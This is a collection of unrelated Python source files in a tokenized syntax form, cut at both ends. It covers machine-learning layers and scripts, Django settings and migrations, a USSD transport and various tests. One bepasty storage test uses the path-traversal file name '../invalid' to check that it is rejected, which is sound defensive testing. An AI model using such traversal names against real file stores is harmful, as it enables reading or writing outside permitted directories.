scene_id_to_index[scene_id]<block_start>sample=dataset[frame_id]<line_sep>depths.append(sample['depth'])<line_sep>poses.append(sample['pose'])<line_sep>superpixels.append(sample['superpixel'])<line_sep>intrinsic=sample['intrinsic']<block_end>world_coordinates,frame_origins,superpixel_origins=project_images_to_world(depths poses intrinsic superpixels scene_id_to_index[scene_id])<for_stmt>frame_id tqdm(scene_id_to_index[scene_id] desc='Scene[Project]')<block_start>sample=dataset[frame_id]<line_sep>frame_coverages=project_world_to_image(sample['depth'] sample['superpixel'] sample['pose'] sample['intrinsic'] world_coordinates frame_origins superpixel_origins)<if_stmt><not>frame_coverages<is><none><block_start>all_frame_coverages[frame_id]=frame_coverages<line_sep>image_paths.append(images[frame_id])<block_end><block_end>#from pprint import pprint #pprint(all_frame_coverages) np.save(os.path.join(constants.SSD_DATASET_ROOT dataset_name "raw" "selections" "coverage_"+superpixel_dir f'{scene_id}.npy') all_frame_coverages)<del_stmt>world_coordinates frame_origins superpixel_origins<del_stmt>depths poses superpixels all_frame_coverages<line_sep>torch.cuda.empty_cache()<block_end><with_stmt>open(os.path.join(constants.SSD_DATASET_ROOT dataset_name "raw" "selections" "coverage_"+superpixel_dir "coverage_paths.txt") "w")<as>fptr<block_start><for_stmt>p image_paths<block_start>fptr.write(p.decode()+"\n")<block_end><block_end><block_end><def_stmt>test_coverage_scannet_sample <block_start><import_stmt>constants<import_stmt>os<import_from_stmt>dataloader dataset_base<import_from_stmt>dataloader.indoor_scenes IndoorScenes<line_sep>lmdb_handle=dataset_base.LMDBHandle(os.path.join(constants.HDD_DATASET_ROOT "scannet-sample" "dataset.lmdb") <false>)<line_sep>train_set=IndoorScenes('scannet-sample' lmdb_handle (240 320) 'train')<line_sep>find_superpixel_coverage('scannet-sample' lmdb_handle (240 320) train_set.image_path_subset)<block_end><if_stmt>__name__<eq>'__main__'<block_start>test_coverage_scannet_sample()<block_end>
# Generated by Django 1.11.21 on 2019-06-12 15:50 <import_from_stmt>django.db migrations<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('blobs' '0008_deletedblobmeta') ]<line_sep>operations=[migrations.DeleteModel(name='BlobExpiration' ) ]<block_end>
<import_stmt>numpy<import_stmt>six<import_from_stmt>chainer.backends cuda<import_from_stmt>chainer.backends intel64<import_from_stmt>chainer function_node<import_from_stmt>chainer.utils type_check<def_stmt>_cu_conv_sum y x n# Convolutional sum # TODO(beam2d): Use scan computation <block_start>rdim=x.size<floordiv>(x.shape[0]<times>x.shape[1])<line_sep>cuda.elementwise('raw T x, int32 rdim, int32 N, int32 n_' 'raw T y' ''' int half_n = n_ / 2; int offset = i / rdim * N * rdim + i % rdim; float sum_part = 0; for (int j = 0; j < N + half_n; ++j) { if (j < N) { sum_part += x[offset + j * rdim]; } if (j >= n_) { sum_part -= x[offset + (j - n_) * rdim]; } if (j >= half_n) { y[offset + (j - half_n) * rdim] = sum_part; } } ''' 'lrn_conv_sum')(x rdim x.shape[1] n y size=x.shape[0]<times>rdim)<block_end><class_stmt>LocalResponseNormalization(function_node.FunctionNode)<block_start>"""Cross-channel normalization function used in AlexNet."""<line_sep>_use_ideep=<false><def_stmt>__init__ self n=5 k=2 alpha=1e-4 beta=.75<block_start>self.n=n<line_sep>self.k=k<line_sep>self.alpha=alpha<line_sep>self.beta=beta<line_sep>self.scale=<none><line_sep>self.indexes=<none><line_sep>self.unit_scale=<none><block_end><def_stmt>check_type_forward self in_types<block_start>type_check.expect(in_types.size()<eq>1)<line_sep>x_type,=in_types<line_sep>type_check.expect(x_type.dtype.kind<eq>'f' x_type.ndim<ge>2 )<block_end><def_stmt>forward_cpu self inputs<block_start><if_stmt>(intel64.should_use_ideep('>=auto')<and>intel64.inputs_all_ready(inputs (4 )))<block_start>self._use_ideep=<true><line_sep><return>self.forward_ideep(inputs)<block_end>x,=inputs<line_sep>self.retain_inputs((0 ))<line_sep>self.retain_outputs((0 ))<line_sep>half_n=self.n<floordiv>2<line_sep>x2=numpy.square(x)<line_sep>sum_part=x2.copy()<for_stmt>i six.moves.range(1 half_n+1)<block_start>sum_part[: i:]<augadd>x2[: :-i]<line_sep>sum_part[: :-i]<augadd>x2[: i:]<block_end>self.unit_scale=self.k+self.alpha<times>sum_part<line_sep>self.scale=self.unit_scale<power>-self.beta<line_sep>y=x<times>self.scale<line_sep><return>y <block_end><def_stmt>forward_ideep self inputs<block_start>x,=inputs<line_sep>self.retain_inputs((0 ))<line_sep>self.retain_outputs((0 ))<line_sep>param=intel64.ideep.localResponseNormalizationParam(self.n self.k self.n<times>self.alpha self.beta intel64.ideep.localResponseNormalizationParam.lrn_across_channels)<line_sep>y,indexes=intel64.ideep.localResponseNormalization.Forward(intel64.ideep.array(x) param)<line_sep>self.indexes=indexes<line_sep><return>y <block_end><def_stmt>forward_gpu self inputs<block_start>x,=inputs<line_sep>self.retain_inputs((0 ))<line_sep>self.retain_outputs((0 ))<line_sep>self.y=cuda.cupy.square(x)# temporary self.scale=cuda.cupy.empty_like(self.y)<line_sep>_cu_conv_sum(self.scale self.y self.n)<line_sep>cuda.elementwise('T x, T k, T alpha, T beta' 'T y, T scale' '''scale = k + alpha * scale; y = x * pow(scale, -beta);''' 'lrn_fwd')(x self.k self.alpha self.beta self.y self.scale)<line_sep><return>self.y <block_end><def_stmt>backward self indexes grad_outputs<block_start>x,=self.get_retained_inputs()<line_sep>y,=self.get_retained_outputs()<line_sep>gy,=grad_outputs<line_sep>f=LocalResponseNormalizationGrad(self.n self.k self.alpha self.beta self._use_ideep self.scale self.indexes self.unit_scale )<line_sep><return>f.apply((x y gy))<block_end><block_end><class_stmt>LocalResponseNormalizationGrad(function_node.FunctionNode)<block_start><def_stmt>__init__ self n k alpha beta use_ideep scale=<none> indexes=<none> unit_scale=<none><block_start>self.n=n<line_sep>self.k=k<line_sep>self.alpha=alpha<line_sep>self.beta=beta<line_sep>self._use_ideep=use_ideep<line_sep>self.scale=scale<line_sep>self.indexes=indexes<line_sep>self.unit_scale=unit_scale<block_end><def_stmt>forward_cpu self inputs<block_start><if_stmt>self._use_ideep<block_start><return>self._backward_ideep(inputs)<block_end>x,y,gy=inputs<line_sep>half_n=self.n<floordiv>2<line_sep>summand=y<times>gy/self.unit_scale<line_sep>sum_part=summand.copy()<for_stmt>i six.moves.range(1 half_n+1)<block_start>sum_part[: i:]<augadd>summand[: :-i]<line_sep>sum_part[: :-i]<augadd>summand[: i:]<block_end>gx=gy<times>self.scale-2<times>self.alpha<times>self.beta<times>x<times>sum_part<line_sep><return>gx <block_end><def_stmt>_backward_ideep self inputs<block_start>x,y,gy=inputs<line_sep>param=intel64.ideep.localResponseNormalizationParam(self.n self.k self.n<times>self.alpha self.beta intel64.ideep.localResponseNormalizationParam.lrn_across_channels)<line_sep>gx=intel64.ideep.localResponseNormalization.Backward(intel64.ideep.array(x) intel64.ideep.array(gy) self.indexes param)<line_sep><return>gx <block_end><def_stmt>forward_gpu self inputs<block_start>x,y,gy=inputs<line_sep>summand=cuda.elementwise('T scale, T y, T gy' 'T summand' 'summand = y * gy / scale' 'lrn_bwd_summand')(self.scale y gy)<line_sep>gx=cuda.cupy.empty_like(x)<line_sep>_cu_conv_sum(gx summand self.n)<line_sep>cuda.elementwise(' T x, T gy, T scale, T beta, T coeff' 'T gx' 'gx = pow(scale, -beta) * gy - coeff * x * gx' 'lrn_bwd')(x gy self.scale self.beta 2<times>self.alpha<times>self.beta gx)<line_sep><return>gx <block_end><def_stmt>backward self indexes grad_outputs# No trivial way to implement double-backward for this function. <block_start><raise>NotImplementedError<block_end><block_end><def_stmt>local_response_normalization x n=5 k=2 alpha=1e-4 beta=.75<block_start>"""Local response normalization across neighboring channels. This function implements normalization across channels. Let :math:`x` an input image with :math:`N` channels. Then, this function computes an output image :math:`y` by following formula: .. math:: y_i = {x_i \\over \\left( k + \\ \\alpha \\sum_{j=\\max{1, i - n/2}}^{\\min{N, i + n/2}} \\ x_j^2 \\right)^\\beta}. Args: x (:class:`~chainer.Variable` or :ref:`ndarray`): Input variable. n (int): Normalization window width. k (float): Smoothing parameter. alpha (float): Normalizer scaling parameter. beta (float): Normalizer power parameter. Returns: ~chainer.Variable: Output variable. See: Section 3.3 of `ImageNet Classification with Deep Convolutional Neural Networks <https://www.cs.toronto.edu/~fritz/absps/imagenet.pdf>`_ """<line_sep><return>LocalResponseNormalization(n k alpha beta).apply((x ))[0]<block_end>
# flake8: noqa <import_from_stmt>.base *<import_from_stmt>os.path abspath dirname join<line_sep>DEBUG=env.bool('DJANGO_DEBUG' default=<true>)<line_sep>TEMPLATES[0]['OPTIONS']['debug']=DEBUG<line_sep>INSTALLED_APPS<augadd>('debug_toolbar' 'django_extensions' )<line_sep>INTERNAL_IPS=('127.0.0.1' )<line_sep># See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation MIDDLEWARE<augadd>('debug_toolbar.middleware.DebugToolbarMiddleware' )<line_sep>SECRET_KEY=env('DJANGO_SECRET_KEY' default='<KEY>')<line_sep>EMAIL_BACKEND='django.core.mail.backends.console.EmailBackend'<line_sep># Use Dummy cache for development CACHES={'default':{'BACKEND':'django.core.cache.backends.dummy.DummyCache' }}<line_sep># Process all tasks synchronously. # Helpful for local development and running tests CELERY_EAGER_PROPAGATES_EXCEPTIONS=<true><line_sep>CELERY_ALWAYS_EAGER=<true><try_stmt><block_start><import_from_stmt>.local *<block_end><except_stmt>ImportError<block_start><pass><block_end>
<import_stmt>pytest<import_from_stmt>bepasty.storage.filesystem Storage<def_stmt>test_contains tmpdir<block_start>storage=Storage(str(tmpdir))<line_sep>name="foo"<line_sep># check if it is not there yet <assert_stmt>name<not><in>storage<with_stmt>storage.create(name 0)# we just want it created, no need to write sth into it <block_start><pass><block_end># check if it is there <assert_stmt>name<in>storage<line_sep>storage.remove(name)<line_sep># check if it is gone <assert_stmt>name<not><in>storage<block_end><def_stmt>test_iter tmpdir<block_start>storage=Storage(str(tmpdir))<line_sep># nothing there yet <assert_stmt>list(storage)<eq>[]<line_sep>names=["foo" "bar" "baz" ]<for_stmt>name names<block_start><with_stmt>storage.create(name 0)# we just want it created, no need to write sth into it <block_start><pass><block_end><block_end><assert_stmt>set(list(storage))<eq>set(names)<block_end><def_stmt>test_invalid_name tmpdir<block_start>storage=Storage(str(tmpdir))<line_sep>name="../invalid"<with_stmt>pytest.raises(RuntimeError)<block_start>storage.create(name 0)<block_end><block_end>
<import_from_stmt>django.conf.urls.defaults *<line_sep>urlpatterns=patterns('' url(r'^login/$' 'authsub.views.login' name="authsub_login") )<line_sep>
# -*- test-case-name: vumi.transports.imimobile.tests.test_imimobile_ussd -*- <import_stmt>re<import_stmt>json<import_from_stmt>datetime datetime timedelta<import_from_stmt>twisted.python log<import_from_stmt>twisted.web http<import_from_stmt>twisted.internet.defer inlineCallbacks<import_from_stmt>vumi.components.session SessionManager<import_from_stmt>vumi.message TransportUserMessage<import_from_stmt>vumi.transports.httprpc HttpRpcTransport<class_stmt>ImiMobileUssdTransport(HttpRpcTransport)<block_start>""" HTTP transport for USSD with IMImobile in India. Configuration parameters: :param str transport_name: The name this transport instance will use to create its queues :param str web_path: The HTTP path to listen on. :param int web_port: The HTTP port to listen on. :param dict suffix_to_addrs: Mappings between url suffixes and to addresses. :param str user_terminated_session_message: A regex used to identify user terminated session messages. Default is '^Map Dialog User Abort User Reason'. :param str user_terminated_session_response: Response given back to the user if the user terminated the session. Default is 'Session Ended'. :param dict redis_manager: The configuration parameters for connecting to Redis. :param int ussd_session_timeout: Number of seconds before USSD session information stored in Redis expires. Default is 600s. """<line_sep>transport_type='ussd'<line_sep>ENCODING='utf-8'<line_sep>EXPECTED_FIELDS=set(['msisdn' 'msg' 'code' 'tid' 'dcs'])<line_sep># errors RESPONSE_FAILURE_ERROR="Response to http request failed."<line_sep>INSUFFICIENT_MSG_FIELDS_ERROR="Insufficiant message fields provided."<def_stmt>validate_config self<block_start>super(ImiMobileUssdTransport self).validate_config()<line_sep># Mappings between url suffixes and the tags used as the to_addr for # inbound messages (e.g. shortcodes or longcodes). This is necessary # since the requests from ImiMobile do not provided us with this. self.suffix_to_addrs=self.config['suffix_to_addrs']<line_sep># IMImobile do not provide a parameter or header to signal termination # of the session by the user, other than sending "Map Dialog User Abort # User Reason: User specific reason" as the request's message content. self.user_terminated_session_re=re.compile(self.config.get('user_terminated_session_message' '^Map Dialog User Abort User Reason'))<line_sep>self.user_terminated_session_response=self.config.get('user_terminated_session_response' 'Session Ended')<block_end>@inlineCallbacks<def_stmt>setup_transport self<block_start>super(ImiMobileUssdTransport self).setup_transport()<line_sep># configure session manager r_config=self.config.get('redis_manager' {})<line_sep>r_prefix="vumi.transports.imimobile_ussd:%s"%self.transport_name<line_sep>session_timeout=int(self.config.get("ussd_session_timeout" 600))<line_sep>self.session_manager=<yield>SessionManager.from_redis_config(r_config r_prefix max_session_length=session_timeout)<block_end>@inlineCallbacks<def_stmt>teardown_transport self<block_start><yield>super(ImiMobileUssdTransport self).teardown_transport()<line_sep><yield>self.session_manager.stop()<block_end><def_stmt>get_to_addr self request<block_start>""" Extracts the request url path's suffix and uses it to obtain the tag associated with the suffix. Returns a tuple consisting of the tag and a dict of errors encountered. """<line_sep>errors={}<line_sep>[suffix]=request.postpath<line_sep>tag=self.suffix_to_addrs.get(suffix <none>)<if_stmt>tag<is><none><block_start>errors['unknown_suffix']=suffix<block_end><return>tag errors<block_end>@classmethod<def_stmt>ist_to_utc cls timestamp<block_start>""" Accepts a timestamp in the format `[M]M/[D]D/YYYY HH:MM:SS (am|pm)` and in India Standard Time, and returns a datetime object normalized to UTC time. """<line_sep><return>(datetime.strptime(timestamp '%m/%d/%Y %I:%M:%S %p')-timedelta(hours=5 minutes=30))<block_end><def_stmt>user_has_terminated_session self content<block_start><return>self.user_terminated_session_re.match(content)<is><not><none><block_end>@inlineCallbacks<def_stmt>handle_raw_inbound_message self message_id request<block_start>errors={}<line_sep>to_addr,to_addr_errors=self.get_to_addr(request)<line_sep>errors.update(to_addr_errors)<line_sep>values,field_value_errors=self.get_field_values(request self.EXPECTED_FIELDS)<line_sep>errors.update(field_value_errors)<if_stmt>errors<block_start>log.msg('Unhappy incoming message: %s'%(errors ))<line_sep><yield>self.finish_request(message_id json.dumps(errors) code=http.BAD_REQUEST)<line_sep><return><block_end>from_addr=values['msisdn']<line_sep>log.msg('ImiMobileTransport receiving inbound message from %s to %s.'%(from_addr to_addr))<line_sep>content=values['msg']<if_stmt>self.user_has_terminated_session(content)<block_start><yield>self.session_manager.clear_session(from_addr)<line_sep>session_event=TransportUserMessage.SESSION_CLOSE<line_sep># IMImobile use 0 for termination of a session self.finish_request(message_id self.user_terminated_session_response headers={'X-USSD-SESSION':['0']})<block_end><else_stmt># We use the msisdn (from_addr) to make a guess about the # whether the session is new or not. <block_start>session=<yield>self.session_manager.load_session(from_addr)<if_stmt>session<block_start>session_event=TransportUserMessage.SESSION_RESUME<line_sep><yield>self.session_manager.save_session(from_addr session)<block_end><else_stmt><block_start>session_event=TransportUserMessage.SESSION_NEW<line_sep><yield>self.session_manager.create_session(from_addr from_addr=from_addr to_addr=to_addr)<block_end><block_end><yield>self.publish_message(message_id=message_id content=content to_addr=to_addr from_addr=from_addr provider='imimobile' session_event=session_event transport_type=self.transport_type transport_metadata={'imimobile_ussd':{'tid':values['tid'] 'code':values['code'] 'dcs':values['dcs'] }})<block_end>@inlineCallbacks<def_stmt>handle_outbound_message self message<block_start>error=<none><line_sep>message_id=message['message_id']<if_stmt>message.payload.get('in_reply_to')<and>'content'<in>message.payload# IMImobile use 1 for resume and 0 for termination of a session <block_start>session_header_value='1'<if_stmt>message['session_event']<eq>TransportUserMessage.SESSION_CLOSE<block_start><yield>self.session_manager.clear_session(message['to_addr'])<line_sep>session_header_value='0'<block_end>response_id=self.finish_request(message['in_reply_to'] message['content'].encode(self.ENCODING) headers={'X-USSD-SESSION':[session_header_value]})<if_stmt>response_id<is><none><block_start>error=self.RESPONSE_FAILURE_ERROR<block_end><block_end><else_stmt><block_start>error=self.INSUFFICIENT_MSG_FIELDS_ERROR<block_end><if_stmt>error<is><not><none><block_start><yield>self.publish_nack(message_id error)<line_sep><return><block_end><yield>self.publish_ack(user_message_id=message_id sent_message_id=message_id)<block_end><block_end>
<import_stmt>asyncio<import_from_stmt>hypothesis given<import_from_stmt>hypothesis.strategies integers<import_from_stmt>tests.base_test_case BaseTestCase<import_from_stmt>electionguard.constants get_generator get_large_prime<import_from_stmt>electionguard.discrete_log compute_discrete_log discrete_log_async DiscreteLog <import_from_stmt>electionguard.group ElementModP ElementModQ ONE_MOD_P ONE_MOD_Q mult_p g_pow_p <def_stmt>_discrete_log_uncached e:ElementModP<arrow>int<block_start>""" A simpler implementation of discrete_log, only meant for comparison testing of the caching version. """<line_sep>count=0<line_sep>g_inv=ElementModP(pow(get_generator() -1 get_large_prime()) <false>)<while_stmt>e<ne>ONE_MOD_P<block_start>e=mult_p(e g_inv)<line_sep>count=count+1<block_end><return>count<block_end><class_stmt>TestDiscreteLogFunctions(BaseTestCase)<block_start>"""Discrete log tests"""<line_sep>@given(integers(0 100))<def_stmt>test_uncached self exp:int# Arrange <block_start>plaintext=ElementModQ(exp)<line_sep>exp_plaintext=g_pow_p(plaintext)<line_sep># Act plaintext_again=_discrete_log_uncached(exp_plaintext)<line_sep># Assert self.assertEqual(plaintext plaintext_again)<block_end>@given(integers(0 1000))<def_stmt>test_cached self exp:int# Arrange <block_start>cache={ONE_MOD_P:0}<line_sep>plaintext=ElementModQ(exp)<line_sep>exp_plaintext=g_pow_p(plaintext)<line_sep># Act (plaintext_again returned_cache)=compute_discrete_log(exp_plaintext cache)<line_sep># Assert self.assertEqual(plaintext plaintext_again)<line_sep>self.assertEqual(len(cache) len(returned_cache))<block_end><def_stmt>test_cached_one self<block_start>cache={ONE_MOD_P:0}<line_sep>plaintext=ONE_MOD_Q<line_sep>ciphertext=g_pow_p(plaintext)<line_sep>(plaintext_again returned_cache)=compute_discrete_log(ciphertext cache)<line_sep>self.assertEqual(plaintext plaintext_again)<line_sep>self.assertEqual(len(cache) len(returned_cache))<block_end><def_stmt>test_cached_one_async self# Arrange <block_start>cache={ONE_MOD_P:0}<line_sep>plaintext=ONE_MOD_Q<line_sep>ciphertext=g_pow_p(plaintext)<line_sep># Act loop=asyncio.new_event_loop()<line_sep>(plaintext_again returned_cache)=loop.run_until_complete(discrete_log_async(ciphertext cache))<line_sep>loop.close()<line_sep># Assert self.assertEqual(plaintext plaintext_again)<line_sep>self.assertEqual(len(cache) len(returned_cache))<block_end><block_end><class_stmt>TestDiscreteLogClass(BaseTestCase)<block_start>"""Discrete log tests"""<line_sep>@given(integers(0 1000))<def_stmt>test_cached self exp:int# Arrange <block_start>plaintext=ElementModQ(exp)<line_sep>exp_plaintext=g_pow_p(plaintext)<line_sep># Act plaintext_again=DiscreteLog().discrete_log(exp_plaintext)<line_sep># Assert self.assertEqual(plaintext plaintext_again)<block_end><def_stmt>test_cached_one self# Arrange <block_start>plaintext=ONE_MOD_Q<line_sep>ciphertext=g_pow_p(plaintext)<line_sep># Act plaintext_again=DiscreteLog().discrete_log(ciphertext)<line_sep># Assert self.assertEqual(plaintext plaintext_again)<block_end><def_stmt>test_cached_one_async self# Arrange <block_start>plaintext=ONE_MOD_Q<line_sep>ciphertext=g_pow_p(plaintext)<line_sep># Act loop=asyncio.new_event_loop()<line_sep>plaintext_again=loop.run_until_complete(DiscreteLog().discrete_log_async(ciphertext))<line_sep>loop.close()<line_sep># Assert self.assertEqual(plaintext plaintext_again)<block_end><block_end>
<import_from_stmt>.registry Registry<line_sep># model MODULE_ZOO_REGISTRY=Registry()<line_sep>MODULE_PROCESS_REGISTRY=Registry()<line_sep>MODULE_WRAPPER_REGISTRY=Registry()<line_sep>MODEL_WRAPPER_REGISTRY=Registry()<line_sep>EMA_REGISTRY=Registry()<line_sep># data DATASET_REGISTRY=Registry()<line_sep>DATALOADER_REGISTRY=Registry()<line_sep>BATCH_SAMPLER_REGISTRY=Registry()<line_sep>AUGMENTATION_REGISTRY=Registry()<line_sep>BATCHING_REGISTRY=Registry()<line_sep># predictor ROI_PREDICTOR_REGISTRY=Registry()<line_sep>BBOX_PREDICTOR_REGISTRY=Registry()<line_sep>MASK_PREDICTOR_REGISTRY=Registry()<line_sep># supervisior ROI_SUPERVISOR_REGISTRY=Registry()<line_sep>BBOX_SUPERVISOR_REGISTRY=Registry()<line_sep>MASK_SUPERVISOR_REGISTRY=Registry()<line_sep># matcher MATCHER_REGISTRY=Registry()<line_sep># sampler ROI_SAMPLER_REGISTRY=Registry()<line_sep>SAMPLER_REGISTRY=Registry()<line_sep># merger ROI_MERGER_REGISTRY=Registry()<line_sep># lr WARM_LR_REGISTRY=Registry()<line_sep>LR_REGISTRY=Registry()<line_sep># evaluator EVALUATOR_REGISTRY=Registry()<line_sep># loss LOSSES_REGISTRY=Registry()<line_sep># image reader IMAGE_READER_REGISTRY=Registry()<line_sep># hook HOOK_REGISTRY=Registry()<line_sep># saver SAVER_REGISTRY=Registry()<line_sep># anchor generate ANCHOR_GENERATOR_REGISTRY=Registry()<line_sep># mask target generate MASK_GENERATOR_REGISTRY=Registry()<line_sep># subcommand SUBCOMMAND_REGISTRY=Registry()<line_sep># initializer INITIALIZER_REGISTRY=Registry()<line_sep># runner RUNNER_REGISTRY=Registry()<line_sep># inferencer INFERENCER_REGISTRY=Registry()<line_sep>VISUALIZER_REGISTRY=Registry()<line_sep># optimizer OPTIMIZER_REGISTRY=Registry()<line_sep>LR_SCHEDULER_REGISTY=Registry()<line_sep>WARM_SCHEDULER_REGISTY=Registry()<line_sep>DATA_BUILDER_REGISTY=Registry()<line_sep>MODEL_HELPER_REGISTRY=Registry()<line_sep># distill MIMIC_REGISTRY=Registry()<line_sep>MIMIC_LOSS_REGISTRY=Registry()<line_sep># box_coder BOX_CODER_REGISTRY=Registry()<line_sep>
# evaluate a smoothed classifier on a dataset <import_stmt>argparse<import_stmt>datetime<import_stmt>os<import_from_stmt>time time<import_from_stmt>architectures get_architecture<import_from_stmt>core Smooth<import_from_stmt>datasets get_dataset DATASETS get_num_classes<import_stmt>torch<line_sep>parser=argparse.ArgumentParser(description='Certify many examples')<line_sep>parser.add_argument("dataset" choices=DATASETS help="which dataset")<line_sep>parser.add_argument("base_classifier" type=str help="path to saved pytorch model of base classifier")<line_sep>parser.add_argument("sigma" type=float help="noise hyperparameter")<line_sep>parser.add_argument("outfile" type=str help="output file")<line_sep>parser.add_argument("--batch" type=int default=1000 help="batch size")<line_sep>parser.add_argument("--skip" type=int default=1 help="how many examples to skip")<line_sep>parser.add_argument("--max" type=int default=-1 help="stop after this many examples")<line_sep>parser.add_argument("--split" choices=["train" "test"] default="test" help="train or test set")<line_sep>parser.add_argument("--N0" type=int default=100)<line_sep>parser.add_argument("--N" type=int default=100000 help="number of samples to use")<line_sep>parser.add_argument("--alpha" type=float default=0.001 help="failure probability")<line_sep>args=parser.parse_args()<if_stmt>__name__<eq>"__main__"# load the base classifier <block_start>checkpoint=torch.load(args.base_classifier)<line_sep>base_classifier=get_architecture(checkpoint["arch"] args.dataset)<line_sep>base_classifier.load_state_dict(checkpoint['state_dict'])<line_sep># create the smooothed classifier g smoothed_classifier=Smooth(base_classifier get_num_classes(args.dataset) args.sigma)<line_sep># prepare output file f=open(args.outfile 'w')<line_sep>print("idx\tlabel\tpredict\tradius\tcorrect\ttime" file=f flush=<true>)<line_sep># iterate through the dataset dataset=get_dataset(args.dataset args.split)<for_stmt>i range(len(dataset))# only certify every args.skip examples, and stop after args.max examples <block_start><if_stmt>i%args.skip<ne>0<block_start><continue><block_end><if_stmt>i<eq>args.max<block_start><break><block_end>(x label)=dataset[i]<line_sep>before_time=time()<line_sep># certify the prediction of g around x x=x.cuda()<line_sep>prediction,radius=smoothed_classifier.certify(x args.N0 args.N args.alpha args.batch)<line_sep>after_time=time()<line_sep>correct=int(prediction<eq>label)<line_sep>time_elapsed=str(datetime.timedelta(seconds=(after_time-before_time)))<line_sep>print("{}\t{}\t{}\t{:.3}\t{}\t{}".format(i label prediction radius correct time_elapsed) file=f flush=<true>)<block_end>f.close()<block_end>
<import_from_future_stmt> absolute_import<import_stmt>pkg_resources<line_sep>__version__='0.3.0'<line_sep>BASE_JAR="pyleus-base.jar"<line_sep>BASE_JAR_PATH=pkg_resources.resource_filename('pyleus' BASE_JAR)<line_sep>
# lint as python3 # Copyright 2019 Google LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=g-complex-comprehension <import_stmt>autograd.numpy<import_from_stmt>autograd.test_util check_grads<import_from_stmt>neural_structural_optimization autograd_lib<import_stmt>numpy<as>np<import_from_stmt>absl.testing absltest<line_sep>cone_filter=autograd_lib.cone_filter<line_sep>gaussian_filter=autograd_lib.gaussian_filter<line_sep>scatter1d=autograd_lib.scatter1d<line_sep>solve_coo=autograd_lib.solve_coo<line_sep>inverse_permutation=autograd_lib.inverse_permutation<line_sep>find_root=autograd_lib.find_root<class_stmt>AutogradLibTest(absltest.TestCase)<block_start><def_stmt>test_gaussian_filter self<block_start>image=np.random.RandomState(0).rand(9 9)<line_sep>width=4<line_sep>np.testing.assert_allclose(gaussian_filter(image width).sum() image.sum())<line_sep>check_grads(<lambda>x:gaussian_filter(x width) modes=['rev'])(image)<block_end><def_stmt>test_cone_filter self<block_start>image=np.random.RandomState(0).rand(5 5)<line_sep>width=4<line_sep>check_grads(<lambda>x:cone_filter(x width) modes=['rev'])(image)<block_end><def_stmt>test_inverse_permutation self<block_start>indices=np.array([4 2 1 7 9 5 6 0 3 8])<line_sep>inv_indices=inverse_permutation(indices)<line_sep>np.testing.assert_array_equal(np.array([7 2 1 8 0 5 6 3 9 4]) inv_indices)<block_end><def_stmt>test_scatter1d self# also tests the `inverse_permutation` function <block_start>nonzero_values=[4 2 7 9]<line_sep>nonzero_indices=[2 3 7 8]<line_sep>array_len=10<line_sep>u=scatter1d(nonzero_values nonzero_indices array_len)<line_sep>np.testing.assert_array_equal(np.array([0. 0. 4. 2. 0. 0. 0. 7. 9. 0.]) u)<block_end><def_stmt>test_coo_solve self# test solve_coo gradients <block_start>indices=np.array([[i%10 (i-j)%10]<for>i range(10)<for>j range(-3 4)]).T<line_sep>entries=np.random.RandomState(0).randn(indices.shape[-1])<line_sep>b=np.random.RandomState(0).rand(10)<line_sep>check_grads(<lambda>x:solve_coo(entries indices x) modes=['rev'])(b)<line_sep>check_grads(<lambda>x:solve_coo(x indices b) modes=['rev'])(entries)<block_end><def_stmt>test_find_root self# solve for a literal square root <block_start>f=<lambda>x y:y<power>2-x<line_sep>result=find_root(f 2 lower_bound=0 upper_bound=2)<line_sep>np.testing.assert_allclose(result np.sqrt(2))<block_end><def_stmt>test_find_root_grad self<block_start>f=<lambda>x y:y<power>2-abs(autograd.numpy.mean(x))<line_sep>x0=np.random.RandomState(0).randn(3)<line_sep>check_grads(<lambda>x:find_root(f x 0 10 1e-12) modes=['rev'])(x0)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>absltest.main()<block_end>
# -*- coding: utf-8 -*- # # Copyright (c) 2018-2019, <NAME> # All rights reserved. # # Licensed under the BSD 3-Clause License: # http://opensource.org/licenses/BSD-3-Clause # <import_stmt>collections<import_from_stmt>collections OrderedDict<as>ODict<import_stmt>hashlib<import_stmt>io<import_stmt>json<import_stmt>os<import_stmt>pathlib<import_stmt>re<import_stmt>sys<import_stmt>textwrap<import_from_stmt>typing Dict List Optional Sequence Union<import_stmt>zipfile<import_from_stmt>.. codeprocessors<import_from_stmt>.. err<import_from_stmt>.. util<class_stmt>Include(dict)<block_start>''' Store code chunk options related to including a file or other external resource. Also perform the include and modify the code chunk as necessary. '''<def_stmt>__init__ self code_chunk include_options# Start by creating fallback values for attributes <block_start>self.code_lines=<none><line_sep>self.code_chunk=code_chunk<if_stmt><not>isinstance(include_options dict)<block_start>code_chunk.source_errors.append('Invalid "include" value "{0}"'.format(include_options))<line_sep><return><block_end><if_stmt><not>all(k<in>self.keywords<for>k include_options)<block_start>unknown_keys=', '.join("{0}".format(k)<for>k include_options<if>k<not><in>self.keywords)<line_sep>code_chunk.source_errors.append('Unknown "include" keywords: {0}'.format(unknown_keys))<block_end><if_stmt><not>all(isinstance(v str)<and>v<for>v include_options.values())<block_start>invalid_value_keys=', '.join("{0}".format(k)<for>k,v include_options.items()<if><not>isinstance(v str)<or><not>v)<line_sep>code_chunk.source_errors.append('Invalid values for "include" keywords: {0}'.format(invalid_value_keys))<block_end>start_keywords=tuple(k<for>k include_options<if>k<in>self._start_keywords)<line_sep>end_keywords=tuple(k<for>k include_options<if>k<in>self._end_keywords)<line_sep>range_keywords=tuple(k<for>k include_options<if>k<in>self._range_keywords)<if_stmt>((range_keywords<and>(start_keywords<or>end_keywords))<or>len(range_keywords)<g>1<or>len(start_keywords)<g>1<or>len(end_keywords)<g>1)<block_start>conflicting_keys=', '.join("{0}".format(k)<for>k include_options<if>k<in>self._selection_keywords)<line_sep>code_chunk.source_errors.append('Too many keywords for selecting part of an "include" file: {0}'.format(conflicting_keys))<block_end>file=include_options.get('file' <none>)<line_sep>encoding=include_options.get('encoding' 'utf8')<if_stmt>file<is><none><block_start>code_chunk.source_errors.append('Missing "include" keyword 